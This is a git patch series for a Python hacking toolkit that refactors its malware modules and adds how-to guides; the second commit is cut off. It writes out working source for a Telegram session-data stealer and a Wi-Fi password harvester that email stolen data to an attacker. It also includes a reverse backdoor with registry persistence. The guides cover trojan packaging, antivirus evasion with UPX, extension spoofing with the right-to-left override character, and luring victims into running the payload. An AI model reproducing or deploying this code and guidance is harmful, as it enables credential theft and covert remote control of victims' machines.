From 2594c15bc43e9dc8e274b33c37a699197863219c Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Sat, 11 Jun 2022 23:12:39 +0530 Subject: [PATCH 1/5] refactor modules update requirements --- .../__init__.py | 0 pyhtools/executable_generator/utils.py | 2 + .../TelegramRemoteCodeExecutor.py | 4 +- pyhtools/malwares/downloader/downloader.py | 5 - pyhtools/malwares/executables/generate.py | 3 - pyhtools/malwares/keylogger/keylogger.py | 2 - .../reverse_backdoor/HTTP/listener.py | 1 - .../malwares/reverse_backdoor/TCP/listener.py | 6 +- .../reverse_backdoor/TCP/reverse_backdoor.py | 11 +- .../telegram_data_harvester.py | 285 ++++++++++-------- .../wireless_profile_harvester.py | 129 ++++---- requirements.txt | 5 +- setup.py | 4 +- 13 files changed, 230 insertions(+), 227 deletions(-) rename pyhtools/{malwares/executables => executable_generator}/__init__.py (100%) create mode 100644 pyhtools/executable_generator/utils.py delete mode 100644 pyhtools/malwares/executables/generate.py diff --git a/pyhtools/malwares/executables/__init__.py b/pyhtools/executable_generator/__init__.py similarity index 100% rename from pyhtools/malwares/executables/__init__.py rename to pyhtools/executable_generator/__init__.py diff --git a/pyhtools/executable_generator/utils.py b/pyhtools/executable_generator/utils.py new file mode 100644 index 0000000..e060667 --- /dev/null +++ b/pyhtools/executable_generator/utils.py @@ -0,0 +1,2 @@ +from pyhtools.UI.colors import * + diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py b/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py index 9f6cce7..df5c501 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py +++ b/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py @@ -3,13 +3,13 @@ from subprocess import check_output -# root_dir = os.path.dirname(__file__) +# set API_KEY and CHAT_ID before starting bot API_KEY = 'your_bot_key/token' CHAT_ID = 0 # int - attacker's user id # to find user id, start the bot, and message this bot with /start -# password = 'password' // password is reserved for future work +# password = 'password' # reserved for future idea regarding authentication help_message = ''' Remote Code Executor BOT Written by Dhrumil Mistry diff --git a/pyhtools/malwares/downloader/downloader.py b/pyhtools/malwares/downloader/downloader.py index a8701c8..f1f29b2 100644 --- a/pyhtools/malwares/downloader/downloader.py +++ b/pyhtools/malwares/downloader/downloader.py @@ -1,4 +1,3 @@ -#!usr/bin/env python import requests def download(url:str)->bool: @@ -17,7 +16,3 @@ def download(url:str)->bool: except Exception as e: print('[-] Exception : ', e) return False - - -url = 'https://upload.wikimedia.org/wikipedia/commons/thumb/4/48/Ludwig_Guttmann2.jpg/800px-Ludwig_Guttmann2.jpg' -download(url) \ No newline at end of file diff --git a/pyhtools/malwares/executables/generate.py b/pyhtools/malwares/executables/generate.py deleted file mode 100644 index 438f62b..0000000 --- a/pyhtools/malwares/executables/generate.py +++ /dev/null @@ -1,3 +0,0 @@ -#!usr/bin/env python3 - -# TODO: Create functions to generate executables using payloads/malwares/ransomwares \ No newline at end of file diff --git a/pyhtools/malwares/keylogger/keylogger.py b/pyhtools/malwares/keylogger/keylogger.py index 87a91a0..b9cb6df 100644 --- a/pyhtools/malwares/keylogger/keylogger.py +++ b/pyhtools/malwares/keylogger/keylogger.py @@ -1,5 +1,3 @@ -#!usr/bin/env python3 -from types import MemberDescriptorType import pynput, threading, subprocess, smtplib class KeyLogger: diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py b/pyhtools/malwares/reverse_backdoor/HTTP/listener.py index bc92c09..1619d38 100644 --- a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py +++ b/pyhtools/malwares/reverse_backdoor/HTTP/listener.py @@ -1,4 +1,3 @@ -from sys import stderr from http.server import BaseHTTPRequestHandler, HTTPServer diff --git a/pyhtools/malwares/reverse_backdoor/TCP/listener.py b/pyhtools/malwares/reverse_backdoor/TCP/listener.py index 40e7d88..c63c966 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/listener.py +++ b/pyhtools/malwares/reverse_backdoor/TCP/listener.py @@ -151,13 +151,13 @@ def run(self): except IndexError: print('[!] Cannot Accept empty command.') - # except Exception as e: - # print('[-] Listener Exception : ', e) + except Exception as e: + print('[-] Listener Exception : ', e) if __name__ == '__main__': try: - listener = Listener('192.168.0.199',8082) + listener = Listener('127.0.0.1',4444) listener.run() except Exception as e: print('[-] Exception : ',e) \ No newline at end of file diff --git a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py b/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py index 2fee01d..8ce1638 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py +++ b/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py @@ -1,4 +1,3 @@ -#!usr/bin/env python3 import socket import subprocess import json @@ -26,20 +25,18 @@ def __init__(self, ip:str, port:int)->None: self.connect_to_listener() - def create_persistence(self): + def create_persistence(self, backdoor_name:str='MyBackdoor.exe'): ''' description: tries to connect to user when machine restarts. params: None returns: None ''' if os.name == 'nt': - # print('inside persistence if.') # TODO: Change MyBackdoor to something less suspectful before creating exe - backdoor_file_path = os.environ['appdata'] + '\\MyBackdoor.exe' + backdoor_file_path = f'{os.environ["appdata"]}\\{backdoor_name}' if not os.path.exists(backdoor_file_path): - # print('inside if if.') shutil.copy(sys.executable, backdoor_file_path) - subprocess.call(f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MyBackdoor /t REG_SZ /d "{backdoor_file_path}"') + subprocess.call(f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v {backdoor_name.removesuffix(".exe")} /t REG_SZ /d "{backdoor_file_path}"') def connect_to_listener(self): @@ -209,7 +206,7 @@ def run(self): if __name__ == '__main__': try : - backdoor = ReverseBackdoor(ip='192.168.0.199', port=8082) + backdoor = ReverseBackdoor(ip='127.0.0.1', port=4444) backdoor.run() except Exception as e: print('Exception :',e) diff --git a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py b/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py index bc4e70c..5123331 100644 --- a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py +++ b/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py @@ -1,138 +1,155 @@ -import time, os, psutil, shutil, smtplib, tempfile, subprocess +import time +import os +import psutil +import shutil +import smtplib +import tempfile +import subprocess from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders -# start timer -# start_time = time.time() - -# move current location to temp directory -temp_path = tempfile.gettempdir() -os.chdir(temp_path) - -# create list to save tdata paths found -tdata_paths = [] - - -def find_tdata_in(path): - ''' - description: find tdata in specific location - ''' - tdata_path = None - for root, dirs, files in os.walk(path): - for dir in dirs: - if 'telegram' in dir.lower(): - telegram_path = os.path.join(root, dir) - - tdata_path = os.path.join(telegram_path, 'tdata') - if os.path.isdir(tdata_path) and tdata_path not in tdata_paths: - tdata_paths.append(tdata_path) - - -def terminate_td(): - ''' - description: kills Telegram processes if running - ''' - if os.name == 'nt': - import wmi - f = wmi.WMI() - for process in f.Win32_Process(): - if 'telegram' in process.name.lower(): - process.Terminate() - else: - processes = subprocess.Popen('ps -A', shell=True, stdout=subprocess.PIPE) - output, error = processes.communicate() - - for line in output.splitlines(): - if 'telegram' in str(line).lower(): - pid = int(line.split(None, 1)[0]) - os.kill(pid, 9) - - -def send_zip(zip_path): - ''' - description: report tdata zip to the attacker - ''' - try: - DESTINATION_ARCHIVE_NAME = zip_path - SUBJECT = "Telegram Data {}".format(zip_path) - # separate emails using comma - RECIPIENTS = "white.tester.test@gmail.com" - - server = "smtp.gmail.com" - port = 587 - username = "yourgmailid" - password = "yourAppPassword" - sender = username - - msg = MIMEMultipart() - msg['Subject'] = SUBJECT - msg['From'] = sender - msg['To'] = RECIPIENTS - - part = MIMEBase("application", "octet-stream") - part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read()) - encoders.encode_base64(part) - part.add_header("Content-Disposition", "attachment; filename=\"%s\"" % (DESTINATION_ARCHIVE_NAME)) - msg.attach(part) - - smtp = smtplib.SMTP(server, port) - smtp.ehlo() - smtp.starttls() - smtp.ehlo() - smtp.login(username,password) - smtp.sendmail(sender, RECIPIENTS, msg.as_string()) - smtp.close() - - except Exception as e: - # print(e) - pass - - - -def create_archive_and_send_mail(source_path:str, dest_path:str): - ''' - desciption: creates archive and send email - ''' - os.chdir(dest_path) - terminate_td() - zip_name = 'tdata_zip_file_{}'.format(time.time()) - shutil.make_archive(zip_name,'zip', dest_path, source_path) - zip_path = os.path.join(dest_path, zip_name + '.zip') - send_zip(zip_path) - os.chdir(dest_path) - os.remove(zip_path) - -def search_in_paritions(): - ''' - description: search for telegram data in mounted partitions - ''' - partitions = psutil.disk_partitions() - for partition in partitions: - find_tdata_in(partition.mountpoint) - - -# target os specific locations to search for tdata -if os.name == 'nt': - probable_installation_paths = [ os.environ['APPDATA'], - os.environ['ALLUSERSPROFILE'], - os.environ['LOCALAPPDATA'], - os.environ['PROGRAMW6432'], - os.environ['PROGRAMFILES(X86)'], - ] - - -else: - probable_installation_paths = [os.environ['HOME'], - ] - -# first search in probable installation locations -for path in probable_installation_paths: - find_tdata_in(path) - -terminate_td() -search_in_paritions() -for tpath in tdata_paths: - create_archive_and_send_mail(source_path=tpath, dest_path=temp_path) - -# print('process Completed in ', time.time() - start_time) \ No newline at end of file + +class TelegramHarvester: + def __init__(self, sender_email: str, sender_passwd: str, server: str = "smtp.gmail.com", port: int = 587, receivers: list[str] = None): + # move current location to temp directory + self.temp_path = tempfile.gettempdir() + os.chdir(self.temp_path) + + # create list to save tdata paths found + self.tdata_paths = [] + + # email configurations + self.sender_email = sender_email + self.sender_passwd = sender_passwd + self.server = server + self.port = port + self.receivers = receivers + + def find_tdata_in(self, path): + ''' + description: find tdata in specific location + ''' + tdata_path = None + for root, dirs, files in os.walk(path): + for dir in dirs: + if 'telegram' in dir.lower(): + telegram_path = os.path.join(root, dir) + + tdata_path = os.path.join(telegram_path, 'tdata') + if os.path.isdir(tdata_path) and tdata_path not in self.tdata_paths: + self.tdata_paths.append(tdata_path) + + def terminate_td(self): + ''' + description: kills Telegram processes if running + ''' + if os.name == 'nt': + import wmi + f = wmi.WMI() + for process in f.Win32_Process(): + if 'telegram' in process.name.lower(): + process.Terminate() + else: + processes = subprocess.Popen( + 'ps -A', shell=True, stdout=subprocess.PIPE) + output, error = processes.communicate() + + for line in output.splitlines(): + if 'telegram' in str(line).lower(): + pid = int(line.split(None, 1)[0]) + os.kill(pid, 9) + + def send_zip(self, zip_path): + ''' + description: report tdata zip to the attacker + ''' + try: + DESTINATION_ARCHIVE_NAME = zip_path + SUBJECT = "Telegram Data {}".format(zip_path) + + # separate emails using comma + RECIPIENTS = ','.join(self.receivers) + + msg = MIMEMultipart() + msg['Subject'] = SUBJECT + msg['From'] = self.sender_email + msg['To'] = RECIPIENTS + + part = MIMEBase("application", "octet-stream") + part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read()) + encoders.encode_base64(part) + part.add_header("Content-Disposition", + "attachment; filename=\"%s\"" % (DESTINATION_ARCHIVE_NAME)) + msg.attach(part) + + smtp = smtplib.SMTP(self.server, self.port) + smtp.ehlo() + smtp.starttls() + smtp.ehlo() + smtp.login(self.sender_email, self.sender_passwd) + smtp.sendmail(self.sender_email, RECIPIENTS, msg.as_string()) + smtp.close() + + return True + + # ignore any exceptions occurred + except Exception as e: + # print(e) + return False + + def create_archive_and_send_mail(self, source_path: str, dest_path: str): + ''' + desciption: creates archive and send email + ''' + os.chdir(dest_path) + self.terminate_td() + zip_name = 'tdata_zip_file_{}'.format(time.time()) + shutil.make_archive(zip_name, 'zip', dest_path, source_path) + zip_path = os.path.join(dest_path, zip_name + '.zip') + self.send_zip(zip_path) + os.chdir(dest_path) + os.remove(zip_path) + + def search_in_paritions(self,): + ''' + description: search for telegram data in mounted partitions + ''' + partitions = psutil.disk_partitions() + for partition in partitions: + self.find_tdata_in(partition.mountpoint) + + def start(self): + # target os specific locations to search for tdata + if os.name == 'nt': + probable_installation_paths = [ + os.environ['APPDATA'], + os.environ['ALLUSERSPROFILE'], + os.environ['LOCALAPPDATA'], + os.environ['PROGRAMW6432'], + os.environ['PROGRAMFILES(X86)'], + ] + + else: + probable_installation_paths = [ + os.environ['HOME'], + ] + + # first search in probable installation locations + for path in probable_installation_paths: + self.find_tdata_in(path) + + self.terminate_td() + self.search_in_paritions() + for tpath in self.tdata_paths: + self.create_archive_and_send_mail( + source_path=tpath, dest_path=self.temp_path) + +if __name__ == '__main__': + tdata_harvester = TelegramHarvester( + sender_email='dummy_email', # dummy email to send collected data + sender_passwd='dummy_email_passwd', # dummy email account password for authentication + server='smtp.gmail.com', # smtp email server domain + port=587, # smtp server port + receivers='attacker_email', # email where harvested data will sent + ) \ No newline at end of file diff --git a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py b/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py index bf5d604..fa8856c 100644 --- a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py +++ b/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py @@ -3,84 +3,77 @@ import re -def send_mail(mail, password, message)->bool: - ''' - sends email from mail to itself. - params: mail, password, message -> str - retuns bool - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - # print('[+] Connected to Google Server.') - server.starttls() - # print('[*] TLS started successfully.') - server.login(mail, password) - # print('[*] Logged in successfully.') - server.sendmail(mail, mail, message) - # print('[*] Data has been sent.') - server.quit() - # print('[*] Server Connection has been closed.') - return True - except smtplib.SMTPException as e: - # print('[-] Exception : ', e) - return False +class WiFiPasswordHarvester: + def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', port: int = 587) -> None: + # smtp conf + self.smtp_server = smtp_server + self.smtp_port = port + # login details + self.email = email + self.passwd = passwd -def get_credentials()->str: - ''' - returns wifi credentials as str - ''' - def get_username(): + def send_mail(self, message: str) -> bool: ''' - returns username if detected else returns "Unkown User" + sends email from mail to itself. + params: mail, password, message -> str + retuns bool ''' - username = subprocess.check_output('whoami', shell=True).decode() - if username: - return username - else: - return 'Unknown User' + try: + server = smtplib.SMTP(self.smtp_server, self.smtp_port) + server.starttls() + server.login(self.email, self.password) + server.sendmail(self.email, self.email, message) + server.quit() + return True + except smtplib.SMTPException as e: + return False + def get_credentials(self) -> str: + ''' + returns wifi credentials as str + ''' + def get_username(): + ''' + returns username if detected else returns "Unkown User" + ''' + username = subprocess.check_output('whoami', shell=True).decode() + if username: + return username + else: + return 'Unknown User' - command = 'netsh wlan show profiles' - networks = subprocess.check_output(command, shell=True).decode() - network_names = re.findall(r'(?:Profile\s*:\s)(.*)', networks) + command = 'netsh wlan show profiles' + networks = subprocess.check_output(command, shell=True).decode() + network_names = re.findall(r'(?:Profile\s*:\s)(.*)', networks) - overall_nw_data = f'Subject: Received Credentials from {get_username()} \n' - ssid_passwds = 'SSID : Password\n' - for network_name in network_names: - if 'QuantumRegion' in network_name: - continue + overall_nw_data = f'Subject: Received Credentials from {get_username()} \n' + ssid_passwds = 'SSID : Password\n' + for network_name in network_names: + if 'QuantumRegion' in network_name: + continue - network_name = network_name.replace('\r','') - command = 'netsh wlan show profile "' + (network_name) + '" key=clear' - - nw_info = subprocess.check_output(command, shell=True).decode() - overall_nw_data += nw_info - - passwd_res = re.search(r'(?:Key\sContent\s*:\s)(.*)', nw_info) - passwd = passwd_res.group(1) + network_name = network_name.replace('\r', '') + command = 'netsh wlan show profile "' + \ + (network_name) + '" key=clear' - ssid_passwds += f'{network_name} : {passwd}\n' + nw_info = subprocess.check_output(command, shell=True).decode() + overall_nw_data += nw_info - overall_nw_data += ssid_passwds - # print(overall_nw_data) - # print(ssid_passwds) - return overall_nw_data + passwd_res = re.search(r'(?:Key\sContent\s*:\s)(.*)', nw_info) + passwd = passwd_res.group(1) + ssid_passwds += f'{network_name} : {passwd}\n' -mail = "your_email@gmail.com" -passwd = "your_password" + overall_nw_data += ssid_passwds + return overall_nw_data -credentials = get_credentials() -# print(credentials) -if credentials: - # print('[*] Recieved Credentials.') - if send_mail(mail=mail, password=passwd, message=credentials): - print('[*] Process Completed Successfully') - pass - else: - # print('[-] Process Interuppted!') - pass -else: - # print('[-] Failed to get credentials.') - pass \ No newline at end of file + def start(self): + credentials = self.get_credentials() + if credentials: + if self.send_mail(message=credentials): + print('[*] Process Completed Successfully') + return True + else: + print('[-] Process Failed.') + return False diff --git a/requirements.txt b/requirements.txt index 9929f28..b9494c4 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,7 @@ beautifulsoup4>=4.9.3 colorama>=0.4.4 #netfilterqueue (for linux devices only): sudo pip3 install --upgrade -U git+https://github.com/kti/python-netfilterqueue +nuitka kamene>=0.32 scapy>=2.4.5 psutil>=5.8.0 @@ -8,4 +9,6 @@ prettytable>=2.1.0 pynput>=1.7.3 pyfiglet>=0.8.post1 pytelegrambotapi>=4.0.1 -requests>=2.25.1 \ No newline at end of file +pyinstaller +requests>=2.25.1 +# wmi # for windows process management \ No newline at end of file diff --git a/setup.py b/setup.py index a2b1db9..a727922 100644 --- a/setup.py +++ b/setup.py @@ -21,7 +21,8 @@ install_requires=[ 'beautifulsoup4', 'colorama', - # 'netfilterqueue', + # 'netfilterqueue', # (for linux devices only): sudo pip3 install -U git+https://github.com/kti/python-netfilterqueue + 'nuitka', 'kamene', 'scapy', 'psutil', @@ -29,6 +30,7 @@ 'pynput', 'pyfiglet', 'pytelegrambotapi', + 'pyinstaller', 'requests', ], classifiers=[ From 47a75166932586261989b98e433b4dc7ffc6bbca Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 02:16:13 +0530 Subject: [PATCH 2/5] refactor project create classes for evil files create examples and HowTo md files --- .../Malwares/CreateTrojanPackage.md | 50 +++++++------ .../Malwares/ReverseBackdoor-HTTP.md | 16 ++++- .../Malwares/ReverseBackdoor-TCP.md | 24 ++++--- HowTo/Malwares/SendEmail.md | 22 ++++++ .../Malwares/TelegramDataHarvester.md | 2 + .../Malwares/TelegramRemoteCodeExecutor.md | 5 +- HowTo/Malwares/WirelessProfileHarvester.md | 7 ++ examples/Malwares/TelegramBackdoor.py | 14 ++++ examples/Malwares/TelegramDataHarvester.py | 12 ++++ .../Malwares/key_logger.py | 2 +- examples/Malwares/wifi-password-harvester.py | 13 ++++ examples/Ransomwares/dmsec_decrypter.py | 14 ++++ examples/Ransomwares/dmsec_encrypter.py | 21 ++++++ examples/Worms/DirClonerWorm.py | 20 ++++++ pyhtools/UI/functions.py | 8 +-- .../malwares}/__init__.py | 0 .../credential_harvester}/__init__.py | 0 .../credential_harvester.py | 59 +++++++++++++++ .../malwares/keylogger}/__init__.py | 0 .../malwares/keylogger/keylogger.py | 0 .../reverse_backdoor/HTTP}/__init__.py | 0 .../reverse_backdoor/HTTP/backdoor.py | 0 .../reverse_backdoor/HTTP/listener.py | 0 .../reverse_backdoor/TCP}/__init__.py | 0 .../malwares/reverse_backdoor/TCP/listener.py | 0 .../reverse_backdoor/TCP/reverse_backdoor.py | 0 .../malwares/reverse_backdoor}/__init__.py | 0 .../telegram_data_harvester}/__init__.py | 0 .../telegram_data_harvester/harvester.py} | 9 --- .../TelegramRemoteCodeExecutor.py | 43 ++++++----- .../__init__.py | 0 pyhtools/evil_files/malwares/utils.py | 36 ++++++++++ .../wireless_password_harvester}/__init__.py | 0 .../wireless_password_harvester/harvester.py} | 24 ++----- .../ransomwares}/__init__.py | 0 .../ransomwares/dmsec/HowToUse.md | 0 .../ransomwares/dmsec}/__init__.py | 0 .../ransomwares/dmsec/decrypter.py | 31 ++------ .../ransomwares/dmsec/encrypter.py} | 46 ++---------- .../worms}/__init__.py | 0 pyhtools/{ => evil_files}/worms/dir_cloner.py | 19 +---- pyhtools/executable_generator/generator.py | 50 +++++++++++++ pyhtools/executable_generator/utils.py | 2 - .../credential_harvester.py | 72 ------------------- pyhtools/malwares/downloader/downloader.py | 18 ----- pyhtools/malwares/send_mail/how to.txt | 6 -- pyhtools/malwares/send_mail/send_mail.py | 33 --------- .../wireless_password_harvester/HowToUse.txt | 4 -- pyhtools/ransomwares/__init__.py | 0 pyhtools/ransomwares/dmsec/__init__.py | 0 pyhtools/worms/__init__.py | 0 51 files changed, 373 insertions(+), 309 deletions(-) rename pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md => HowTo/Malwares/CreateTrojanPackage.md (59%) rename pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md => HowTo/Malwares/ReverseBackdoor-HTTP.md (97%) rename pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md => HowTo/Malwares/ReverseBackdoor-TCP.md (71%) create mode 100644 HowTo/Malwares/SendEmail.md rename pyhtools/malwares/telegram_data_harvester/HowToUse.md => HowTo/Malwares/TelegramDataHarvester.md (99%) rename pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md => HowTo/Malwares/TelegramRemoteCodeExecutor.md (96%) create mode 100644 HowTo/Malwares/WirelessProfileHarvester.md create mode 100644 examples/Malwares/TelegramBackdoor.py create mode 100644 examples/Malwares/TelegramDataHarvester.py rename pyhtools/malwares/keylogger/dlogs.py => examples/Malwares/key_logger.py (64%) create mode 100644 examples/Malwares/wifi-password-harvester.py create mode 100644 examples/Ransomwares/dmsec_decrypter.py create mode 100644 examples/Ransomwares/dmsec_encrypter.py create mode 100644 examples/Worms/DirClonerWorm.py rename pyhtools/{malwares/TelegramRemoteCodeExecutor => evil_files/malwares}/__init__.py (100%) rename pyhtools/{malwares/Trojans => evil_files/malwares/credential_harvester}/__init__.py (100%) create mode 100644 pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py rename pyhtools/{malwares => evil_files/malwares/keylogger}/__init__.py (100%) rename pyhtools/{ => evil_files}/malwares/keylogger/keylogger.py (100%) rename pyhtools/{malwares/credential_harvester => evil_files/malwares/reverse_backdoor/HTTP}/__init__.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/HTTP/backdoor.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/HTTP/listener.py (100%) rename pyhtools/{malwares/downloader => evil_files/malwares/reverse_backdoor/TCP}/__init__.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/TCP/listener.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/TCP/reverse_backdoor.py (100%) rename pyhtools/{malwares/keylogger => evil_files/malwares/reverse_backdoor}/__init__.py (100%) rename pyhtools/{malwares/reverse_backdoor/HTTP => evil_files/malwares/telegram_data_harvester}/__init__.py (100%) rename pyhtools/{malwares/telegram_data_harvester/telegram_data_harvester.py => evil_files/malwares/telegram_data_harvester/harvester.py} (92%) rename pyhtools/{malwares/TelegramRemoteCodeExecutor => evil_files/malwares/telegram_remote_code_executor}/TelegramRemoteCodeExecutor.py (80%) rename pyhtools/{malwares/reverse_backdoor/TCP => evil_files/malwares/telegram_remote_code_executor}/__init__.py (100%) create mode 100644 pyhtools/evil_files/malwares/utils.py rename pyhtools/{malwares/reverse_backdoor => evil_files/malwares/wireless_password_harvester}/__init__.py (100%) rename pyhtools/{malwares/wireless_password_harvester/wireless_profile_harvester.py => evil_files/malwares/wireless_password_harvester/harvester.py} (74%) rename pyhtools/{malwares/send_mail => evil_files/ransomwares}/__init__.py (100%) rename pyhtools/{ => evil_files}/ransomwares/dmsec/HowToUse.md (100%) rename pyhtools/{malwares/telegram_data_harvester => evil_files/ransomwares/dmsec}/__init__.py (100%) rename pyhtools/{ => evil_files}/ransomwares/dmsec/decrypter.py (78%) rename pyhtools/{ransomwares/dmsec/dmsec_ransomeware.py => evil_files/ransomwares/dmsec/encrypter.py} (56%) rename pyhtools/{malwares/wireless_password_harvester => evil_files/worms}/__init__.py (100%) rename pyhtools/{ => evil_files}/worms/dir_cloner.py (89%) create mode 100644 pyhtools/executable_generator/generator.py delete mode 100644 pyhtools/executable_generator/utils.py delete mode 100644 pyhtools/malwares/credential_harvester/credential_harvester.py delete mode 100644 pyhtools/malwares/downloader/downloader.py delete mode 100644 pyhtools/malwares/send_mail/how to.txt delete mode 100644 pyhtools/malwares/send_mail/send_mail.py delete mode 100644 pyhtools/malwares/wireless_password_harvester/HowToUse.txt delete mode 100644 pyhtools/ransomwares/__init__.py delete mode 100644 pyhtools/ransomwares/dmsec/__init__.py delete mode 100644 pyhtools/worms/__init__.py diff --git a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md b/HowTo/Malwares/CreateTrojanPackage.md similarity index 59% rename from pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md rename to HowTo/Malwares/CreateTrojanPackage.md index 16033b5..a78b68b 100644 --- a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md +++ b/HowTo/Malwares/CreateTrojanPackage.md @@ -1,37 +1,44 @@ -# Packaging Trojans with any file. - - ## Using App Data +# Packaging Trojans with any file + +## Using App Data + +### Steps - ### Steps - Install Pyinstaller - Downloading Icon : - - Download Icon from [IconFinder](https://iconfinder.com/) - - set filters to free and choose high resolution. - - download icon + - Download Icon from [IconFinder](https://iconfinder.com/) + - set filters to free and choose high resolution. + - download icon - Changing downloaded png to ico - - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) - - Upload image - - choose desired settings - - convert and download ico file + - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) + - Upload image + - choose desired settings + - convert and download ico file - If using requests use 2.5.1 - ``` - $ pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" + + ```bash + pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" ``` ### Bypassing AV using UPX + - Download [UPX](https://github.com/upx/upx/releases/tag/v3.96) -- Extract files +- Extract files - Use UPX to compress pyinstaller generated executable - Syntax: - ``` - $ ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" + + ```bash + ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" ``` ### Spoofing File Type + - Copy Right to left override character (U+202E). copy from below or from [unicode-explorer website](https://unicode-explorer.com/c/202E) -``` -‮ -``` + + ```string + ‮ + ``` + - file_name-`(type_everything_in_reverse_order)` and paste copied character after `-`. - eg : sample_pdf-`fdp.exe` @@ -46,5 +53,6 @@ - spoofed file_name : spoofed_al`exe.pdf` - actual file_name : spoofed_al`fdp.exe` -### Send File to victim -- Send file to victim through using attacks or social engineering. \ No newline at end of file +### Send File to victim + +- Send file to victim through using attacks or social engineering. diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-HTTP.md similarity index 97% rename from pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-HTTP.md index e886bcf..dd61f9e 100644 --- a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-HTTP.md @@ -5,14 +5,18 @@ ## Usage ### Attack over LAN + - Start listener + ```bash python3 listener.py ``` + > Default port = 8080 > Change port in `listerner.py` on line 33 if another service is using 8080 port - Edit `IP` and `PORT` values in `backdoor.py` on line 48 + ```python IP = 'attacker_local_ip' PORT = attacker_port # 8080 @@ -21,35 +25,41 @@ ### Attack over the internet - Start a ssh tunnel on attacker's device. + ```bash ssh -R 80:localhost: ``` - > Note : Replace with port on which local server is running + > Note : Replace with port on which local server is running - Copy link that will be available after successfully tunelling between attacker's machine and localhost.run server. + ``` example : .localhost.run ``` - Start Listener on your localhost using + ```bash python3 listener.py ``` - Replace copied link in `backdoor.py` on line 48. + ```python IP = '.localhost.run' ``` - Use social engineering to make user to execute the python file or created standalone executable/trojan. Use python to run backdoor.py script. + ``` python3 backdoor.py ``` - Now use post exploitation tools to gain admin priviliges -# Tested on +# Tested on + - Windows 10 - Debian based OSes -- Android Termux \ No newline at end of file +- Android Termux diff --git a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-TCP.md similarity index 71% rename from pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-TCP.md index 1b12f3a..b3aa391 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-TCP.md @@ -1,5 +1,8 @@ +# TCP backdoor + ## Change Values according to need + - change ip and port to your desired values in listener.py and reverse_backdoor.py - run listener.py on attackers machine. @@ -7,26 +10,29 @@ - run backdoor.py on victims machine. ## Create a executable\standalone + - pip3 install pyinstaller -- Creating executable with console: +- Creating executable with console: + ```bash - $ pyinstaller python_file.py --onefile + pyinstaller python_file.py --onefile ``` -- Creating executable without console: +- Creating executable without console: + ```bash - $ pyinstaller python_file.py --onefile --noconsole + pyinstaller python_file.py --onefile --noconsole ``` - -> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. +> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. > If we're using STDI/O streams then we have to set then to DEVNULL = open(os.devnull, 'wb') then set IOstreams to DEVNULL > if using subprocess.check_output then use subprocess.check_output(command, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL). > here stdio is being handled by check_output. so no need to handle stdio. ## Create windows executable on linux -- Install Wine -- 